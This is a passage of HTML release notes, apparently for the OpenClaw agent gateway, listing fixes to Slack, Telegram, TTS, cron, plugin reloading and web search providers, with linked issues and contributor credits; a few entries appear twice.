<p>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</p>
</li>
<li>
<p>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</p>
</li>
<li>
<p>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</p>
</li>
<li>
<p>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</p>
</li>
<li>
<p>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</p>
</li>
<li>
<p>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</p>
</li>
<li>
<p>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</p>
</li>
<li>
<p>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rixcorp-oc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rixcorp-oc">@rixcorp-oc</a>.</p>
</li>
<li>
<p>Slack/message actions: send media before the follow-up Block Kit message when Slack <code>send</code> includes a file plus presentation or interactive controls, so file attachments are no longer rejected. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HirokiKobayashi-R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HirokiKobayashi-R">@HirokiKobayashi-R</a>.</p>
</li>
<li>
<p>Slack/DMs: honor <code>dmHistoryLimit</code> for fresh 1:1 Slack DM sessions by backfilling recent conversation history before the current reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brantley-creator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brantley-creator">@brantley-creator</a>.</p>
</li>
<li>
<p>Slack/DMs: keep top-level direct messages on the stable DM session even when <code>replyToMode</code> targets Slack thread replies, preserving context across DM turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>. Thanks @daye-jjeong.</p>
</li>
<li>
<p>Slack/delivery: preserve Slack Web API missing-scope details in outbound delivery errors, so queued retry state identifies the OAuth scope to add. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>. Thanks @alexey-pelykh.</p>
</li>
<li>
<p>Slack/capabilities: read granted scopes from <code>auth.test</code> response metadata before trying legacy scope APIs, so modern bot tokens no longer report <code>unknown_method</code> for channel capabilities. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>. Thanks @Qquanwei and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Slack/DMs: send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code> while keeping conversation resolution for uploads and threaded sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>. Thanks @MarkMolina.</p>
</li>
<li>
<p>Slack/routing: match route bindings written with Slack target syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, so bound Slack peers route to the configured agent instead of <code>main</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>. Thanks @Winnsolutionsadmin.</p>
</li>
<li>
<p>Slack/routing: match public-channel allowlist entries written as <code>channel:C...</code> against bare Slack runtime channel IDs, so allowed channel mentions do not fail as <code>channel-not-allowed</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @babutree and @Realworld404.</p>
</li>
<li>
<p>Slack/message actions: prefer the account bound to the outbound target peer before falling back to the agent's first channel account, so multi-workspace sends use the intended Slack account. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @rijhsinghani.</p>
</li>
<li>
<p>Slack/delivery: retry Slack Web API writes only when the SDK wraps a DNS request failure such as <code>EAI_AGAIN</code>, so transient resolver hiccups can recover without retrying platform errors that may duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>. Thanks @sonnyb9.</p>
</li>
<li>
<p>Slack/message actions: forward agent-scoped media roots through the bundled upload-file action path, so workspace files can be attached without failing the local-media guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>. Thanks @benpchandler.</p>
</li>
<li>
<p>Slack/mentions: resolve <code>&lt;!subteam^...&gt;</code> user-group mentions through Slack <code>usergroups.users.list</code> and treat them as explicit mentions only when the bot user is a member, so mention-gated agent channels wake for real user-group mentions without config-only allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>. Thanks @CG-Intelligence-Agent-Jack.</p>
</li>
<li>
<p>Slack/message tool: let <code>read</code> fetch an exact Slack message timestamp, including a specific thread reply when paired with <code>threadId</code>, instead of returning only the parent thread or recent channel history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @zomars.</p>
</li>
<li>
<p>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</p>
</li>
<li>
<p>Web search/Gemini: route agent abort signals into provider fetches and log provider-side abort failures as normal tool errors instead of silently aborting the run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>. Thanks @RoseKongPS.</p>
</li>
<li>
<p>Web search: point missing-key errors to <code>web_fetch</code> for known URLs and the browser tool for interactive pages. Thanks @zhaoyang97.</p>
</li>
<li>
<p>Web search: late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, so existing sessions do not keep stale unresolved SecretRefs after secrets reload. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>. Thanks @richardmqq.</p>
</li>
<li>
<p>Web search/Gemini: reuse <code>models.providers.google.apiKey</code> and <code>models.providers.google.baseUrl</code> as lower-priority fallbacks for Gemini web search after dedicated search config and <code>GEMINI_API_KEY</code>. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>. Thanks @Aoiujz.</p>
</li>
<li>
<p>Web search/Gemini: pass <code>freshness</code> and <code>date_after</code>/<code>date_before</code> filters through Google Search grounding time ranges. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>. Thanks @ismael-81.</p>
</li>
<li>
<p>Web search/DuckDuckGo: include the keyless DuckDuckGo provider in the web search setup wizard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search: honor <code>baseUrl</code> overrides for Gemini, Grok, and x_search provider-owned config, so proxy-backed search tools no longer dial hardcoded public endpoints. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Web search/Brave: point Brave provider metadata at the canonical <code>/tools/brave-search</code> docs page and make the legacy <code>/brave-search</code> docs page a redirect stub. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>. Thanks @Magicray1217 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search/Brave: allow <code>freshness</code> and bounded date ranges in <code>llm-context</code> mode, matching Brave's documented LLM Context API support. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @remusao.</p>
</li>
<li>
<p>Web fetch: resolve external plugin <code>webFetchProviders</code> for non-sandboxed <code>web_fetch</code>, while keeping sandboxed fetches limited to bundled providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>. Thanks @ultrahighsuper and @mingmingtsao.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</p>
</li>
<li>
